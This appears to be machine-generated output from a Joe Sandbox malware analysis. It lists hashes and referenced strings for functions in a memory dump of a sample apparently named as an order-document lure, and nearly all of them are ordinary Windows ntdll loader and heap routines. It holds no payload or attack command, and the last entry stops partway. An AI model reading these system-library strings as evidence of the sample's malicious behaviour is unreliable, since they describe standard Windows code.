                                          • Instruction ID: 6c2e790b81312f9a8a01bfc1812462bda1de68625523a5827dc338600c2b805a
                                          • Opcode Fuzzy Hash: 8769b7ae1c937c61a4b1be7124f0674e235c3d3277cde239f442138fb5fb8608
                                          • Instruction Fuzzy Hash: 9CC187B4908382CFE711CF58C180B5AB7E4EF89744F04897AF8959B250E734EA5ACB52
                                          Strings
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 33B4847E
                                          • @, xrefs: 33B484B1
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B48341
                                          • LdrpInitializeProcess, xrefs: 33B48342
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 70e418969a2ac6c866c5a30854cadd376de5feed8e735ea5eceb0e3cbaa5ca3f
                                          • Instruction ID: 396bd573c9998f675a74db9f6af3be9a6af84a75043647e81a09070737cc9408
                                          • Opcode Fuzzy Hash: 70e418969a2ac6c866c5a30854cadd376de5feed8e735ea5eceb0e3cbaa5ca3f
                                          • Instruction Fuzzy Hash: BE918A71909395AFE721DE20C840EABBBECEF84384F44093EFA88D6550E735C944DB66
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 33B820C0
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33B81FE3, 33B820BB
                                          • SXS: %s() passed the empty activation context, xrefs: 33B81FE8
                                          • .Local, xrefs: 33B427F8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: e73ed88f9ce2731a0096978919edb70549a0ac23053f515f81595f4e6b83fa46
                                          • Instruction ID: c14f79723061ce344ad3b5d427cec35ea136b40e88189e6735d40f3e75edbbd3
                                          • Opcode Fuzzy Hash: e73ed88f9ce2731a0096978919edb70549a0ac23053f515f81595f4e6b83fa46
                                          • Instruction Fuzzy Hash: 72A19B759003299BEB24CF64DC84B99B3B4FF58354F1501FAE888AB251DB319E81EF94
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33B70E2F
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33B70E72
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33B70DEC
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33B70EB5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: ae2a91513a61aa4455bfd27be068d6291bb364e4427c70c100b2c66d5b93fed1
                                          • Instruction ID: f18be00af7f7cc718ea4a1def6e743c1f562639adf9d91625f5fc16067836561
                                          • Opcode Fuzzy Hash: ae2a91513a61aa4455bfd27be068d6291bb364e4427c70c100b2c66d5b93fed1
                                          • Instruction Fuzzy Hash: 7F71ACB1D083189FE750DF14C884F8B7BA8EF847A4F444879FD888A656D734E588DB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: c84c54da9d8182e18baadd4d94612d3e72781c5a710b455f1dcd5540a8f43964
                                          • Instruction ID: cdc363db75416f02168328499d0c344fa1d0e4978cd670fb7b9ff34e9f0bdf04
                                          • Opcode Fuzzy Hash: c84c54da9d8182e18baadd4d94612d3e72781c5a710b455f1dcd5540a8f43964
                                          • Instruction Fuzzy Hash: 4F61E1757053809FE311CB64C944F5BBBE9EB84B94F080979F9998B6A2DB34D840CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 2994545307-1391187441
                                          • Opcode ID: 401ab6bb13dbce464e3dd840f1918e695dfbf2f0c1d1c629fbb864acf466c813
                                          • Instruction ID: a2317b29b75b7aa1969cfba2da1d460709d6deda20a680553b5bd88d7e2fef34
                                          • Opcode Fuzzy Hash: 401ab6bb13dbce464e3dd840f1918e695dfbf2f0c1d1c629fbb864acf466c813
                                          • Instruction Fuzzy Hash: 8931A136A01215FFDB11CB59DC84F9ABBB8EF45764F1444B2F914AB2A2D770E940CE60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                          • API String ID: 0-1168191160
                                          • Opcode ID: 02db20453926cd89ae09cedbd43b0ad827ed1deaafa6aee9d497844671b34c00
                                          • Instruction ID: 15ce4dc262991dee44944811f29449681816755da1c5e7fc1dcfa6337e4583df
                                          • Opcode Fuzzy Hash: 02db20453926cd89ae09cedbd43b0ad827ed1deaafa6aee9d497844671b34c00
                                          • Instruction Fuzzy Hash: 22F16DB5A087288BDB60CB18CC90B99B3B5EF44754F5441FAE94DA7240EB319E85CF64
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 33B11632
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33B11648
                                          • HEAP: , xrefs: 33B114B6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 26bca43d3d6441c02809e21faedd78ed8110226bd4307b991974c421f932bbcd
                                          • Instruction ID: 91160f99f2597673f6bc74e368fa27dc227275107a911b8db3f660e62ee7aa97
                                          • Opcode Fuzzy Hash: 26bca43d3d6441c02809e21faedd78ed8110226bd4307b991974c421f932bbcd
                                          • Instruction Fuzzy Hash: 5CE1ED74A043559FEB18CF28C491BBABBE5EF88304F188979E4D6CB246E734E950DB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1145731471
                                          • Opcode ID: 1903fdc085ce0cb6ee811efdfc64ce749987545638dcfcb9f186c9271b3dbd06
                                          • Instruction ID: df6102a1f650bdbd81e012a792b97a947252e8abbb4fa041887a4bbbd2f1e18e
                                          • Opcode Fuzzy Hash: 1903fdc085ce0cb6ee811efdfc64ce749987545638dcfcb9f186c9271b3dbd06
                                          • Instruction Fuzzy Hash: 95B1B976E187158BDB24CF69C890B9DB3B5EF44790F284439E965EB780D730E840CB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          • Opcode ID: 64ee50aa7056cc82acf1631fcd35d3386c38804484b3e31ba4d5c32c600a7297
                                          • Instruction ID: 40b1e1de06d84563bd49b0b05554f7ac1e5abe5b7d9ebf062a89f0434b3cd6fa
                                          • Opcode Fuzzy Hash: 64ee50aa7056cc82acf1631fcd35d3386c38804484b3e31ba4d5c32c600a7297
                                          • Instruction Fuzzy Hash: EAB19D71A08351AFF711DF54C880F9BB7E8EB48754F450939FA989B650DB70EC448BA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: de91ac9b3b1946f804631cdaec3cac4056f5d469335fe2bb66253f290c3965e8
                                          • Instruction ID: 4259708bccf7f117623ec8e3cc89dbb1af9bc552c2fd21e75b910b0e0a2d654d
                                          • Opcode Fuzzy Hash: de91ac9b3b1946f804631cdaec3cac4056f5d469335fe2bb66253f290c3965e8
                                          • Instruction Fuzzy Hash: 30A16A75D016299BEB21DF64CC88B9AB7B8EF08714F1005FAE908E7251EB359E84CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: 11e7743cf5c49dbabb41c457abd3d37bafcef178bc6ef2928f241efa1be1e602
                                          • Instruction ID: e324bd33f8b0a8462fbe3a54579364135b99758ab0ede5d2bb15be652eefc60c
                                          • Opcode Fuzzy Hash: 11e7743cf5c49dbabb41c457abd3d37bafcef178bc6ef2928f241efa1be1e602
                                          • Instruction Fuzzy Hash: 42817A7160C750AFE711CB28C880F6ABBE8EF85750F480979FD88DB290DB74D9048B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                          • API String ID: 0-373624363
                                          • Opcode ID: f3e20cd8cd96047a3b2815566d32d82b54e718b253446fc8be8f1c94cee2f640
                                          • Instruction ID: 4185def68319c43d6db0908f7a188d698c9d6336d000390ef1c444e1194d28b2
                                          • Opcode Fuzzy Hash: f3e20cd8cd96047a3b2815566d32d82b54e718b253446fc8be8f1c94cee2f640
                                          • Instruction Fuzzy Hash: A091CE75E04369CFEB11CF54D450B9EB7B0FF053A4F2881A9E854AB290D778DA90CBA0
                                          Strings
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33BEB3AA
                                          • TargetNtPath, xrefs: 33BEB3AF
                                          • GlobalizationUserSettings, xrefs: 33BEB3B4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: 5c41ed2d11d19167c9f8779e662d0c006248bc75c4ce21fa48654c8fd750223f
                                          • Instruction ID: dc18baf0fe242754d288988a245f78d556b0429c47212aa85d4e0d75ad7427fa
                                          • Opcode Fuzzy Hash: 5c41ed2d11d19167c9f8779e662d0c006248bc75c4ce21fa48654c8fd750223f
                                          • Instruction Fuzzy Hash: DD615E72D46229ABDB21DF58EC98F9AB7B8EB04711F4101F9E508A7250DB74DE84CF90
                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33B6E455
                                          • HEAP[%wZ]: , xrefs: 33B6E435
                                          • HEAP: , xrefs: 33B6E442
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: cf67a399b48c397f7ffff44c5666adf6bcc129f27ff791eb6d0d1da0dca2b11c
                                          • Instruction ID: 696a1343fcd6174f59840e0d54021eb09742f3ad657627426305706e2be25422
                                          • Opcode Fuzzy Hash: cf67a399b48c397f7ffff44c5666adf6bcc129f27ff791eb6d0d1da0dca2b11c
                                          • Instruction Fuzzy Hash: 1A51C035A00794EFE312CBA8C984F9ABBE8FF04644F0441B5E5948B662D774EA14CB60
                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 33B7A396
                                          • LdrpCompleteMapModule, xrefs: 33B7A39D
                                          • minkernel\ntdll\ldrmap.c, xrefs: 33B7A3A7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 9bef26e82e5aae70184d849eba7aecd536fac174c802c5ac626ab91af1222d9d
                                          • Instruction ID: 88fce8e5d4b639d1249ac3ef79383840338787f6d79981eba4d73db1f6004356
                                          • Opcode Fuzzy Hash: 9bef26e82e5aae70184d849eba7aecd536fac174c802c5ac626ab91af1222d9d
                                          • Instruction Fuzzy Hash: AC513478A01761DBE711DF58C940B0A77E8FF41764F1602B9E8619B7D1DB31E900CB50
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 33BBD792
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 33BBD7B2
                                          • HEAP: , xrefs: 33BBD79F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: b69fc0dc17a8fff56da5b2f118f22dbc95802f8081be31759583186057eb565b
                                          • Instruction ID: 3307c007b7dfcb98ecbf5fdbc0bb40f48843b4e88a49246a2765dfa43941f6c8
                                          • Opcode Fuzzy Hash: b69fc0dc17a8fff56da5b2f118f22dbc95802f8081be31759583186057eb565b
                                          • Instruction Fuzzy Hash: 505103791007608FEB50DF2AC8407B277F1EB452C8F9548AEE4D68B581EE2ED847DB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          • Opcode ID: 27429b362e7c5b7a37feb90de730470aeb26304221c9a501e84d983c51e70276
                                          • Instruction ID: 50967ca1cb1db98ae3d91bf04ee204da03e5293c561babee55549104e4d414a4
                                          • Opcode Fuzzy Hash: 27429b362e7c5b7a37feb90de730470aeb26304221c9a501e84d983c51e70276
                                          • Instruction Fuzzy Hash: E941E5B8700750CFEF15CA1CC495BA9BF94EB02249F6844B9E4868B953CB75D886CF21
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 33B81954
                                          • LdrpAllocateTls, xrefs: 33B8194A
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33B81943
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: 2391aa4d1ed8a61ff84298e999aaf9ea272b17b850e392d6401bba3d1af2a473
                                          • Instruction ID: bc65a508cf766700394eedf79f325bf8c51d02ea4c0472aa554773ce5cf2cd6c
                                          • Opcode Fuzzy Hash: 2391aa4d1ed8a61ff84298e999aaf9ea272b17b850e392d6401bba3d1af2a473
                                          • Instruction Fuzzy Hash: 934176B5E01344AFDB04CFA9C881EAEBBF5FF48300F04852AE405AB651DB39A801CF90
                                          Strings
                                          • Actx , xrefs: 33B432CC
                                          • RtlCreateActivationContext, xrefs: 33B82803
                                          • SXS: %s() passed the empty activation context data, xrefs: 33B82808
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                          • API String ID: 0-859632880
                                          • Opcode ID: a0fa0d3fc4f33769fe9a0be9c9ad40fd31bcdf7f77887f28e2679f3749cd130c
                                          • Instruction ID: ef6cf50a7e2187bf92d853eb89105f15f59c47d6d74a42b43bb42e9bdffea8be
                                          • Opcode Fuzzy Hash: a0fa0d3fc4f33769fe9a0be9c9ad40fd31bcdf7f77887f28e2679f3749cd130c
                                          • Instruction Fuzzy Hash: 4F311E72A003569FEF01CE28D880F9A37A4EF44750F994879EC089F282DB70D916CBA0
                                          Strings
                                          • @, xrefs: 33B9B2F0
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 33B9B2B2
                                          • GlobalFlag, xrefs: 33B9B30F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          • Opcode ID: bf8dffe372896561147e79f7f2f3cee69e140994d5e452b47d5179c4160c4cd9
                                          • Instruction ID: ea63984835cf76f4e127ba2996ea3abd29e7ac34fe142380980d238e6dbc755a
                                          • Opcode Fuzzy Hash: bf8dffe372896561147e79f7f2f3cee69e140994d5e452b47d5179c4160c4cd9
                                          • Instruction Fuzzy Hash: D1312AB5E01219AEEB10DFA4DC80EEEBBBCEB48744F444479E605EB141D7749B048B90
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 33B8185B
                                          • LdrpInitializeTls, xrefs: 33B81851
                                          • DLL "%wZ" has TLS information at %p, xrefs: 33B8184A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 524c0f208dca9288641027b5fb1fc38897cbe0f61d55a20fb6e1fe4f508b522b
                                          • Instruction ID: e1bf3c113c96f17db7e7efe4d43640825b5bf7d893fbfcc91cbb40418fac6a3b
                                          • Opcode Fuzzy Hash: 524c0f208dca9288641027b5fb1fc38897cbe0f61d55a20fb6e1fe4f508b522b
                                          • Instruction Fuzzy Hash: 63313AB1E10390AFE7109B4ACD45FAA77ACFB44384F01003AE402B7281DB70ED459BA4
                                          Strings
                                          • @, xrefs: 33B511C5
                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 33B5119B
                                          • BuildLabEx, xrefs: 33B5122F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3051831665
                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                          • Instruction ID: d04182a878a4c9038160b488173eff150fabae6c82a708e960bce8e6ebac5723
                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                          • Instruction Fuzzy Hash: CB314B76D01719BBEF118B94CC44EEEBBB9EB84650F004136F514EB2A0EB31DA459BA0
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 33B985DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 63099dc32220401fe10c4df1d6c5c12ea793e2200fffaf3d71562987e427a06b
                                          • Instruction ID: 4f592723b00f6cf2ea48db99ffe0cccdd20be325b68cdeb4666626f2acd340dc
                                          • Opcode Fuzzy Hash: 63099dc32220401fe10c4df1d6c5c12ea793e2200fffaf3d71562987e427a06b
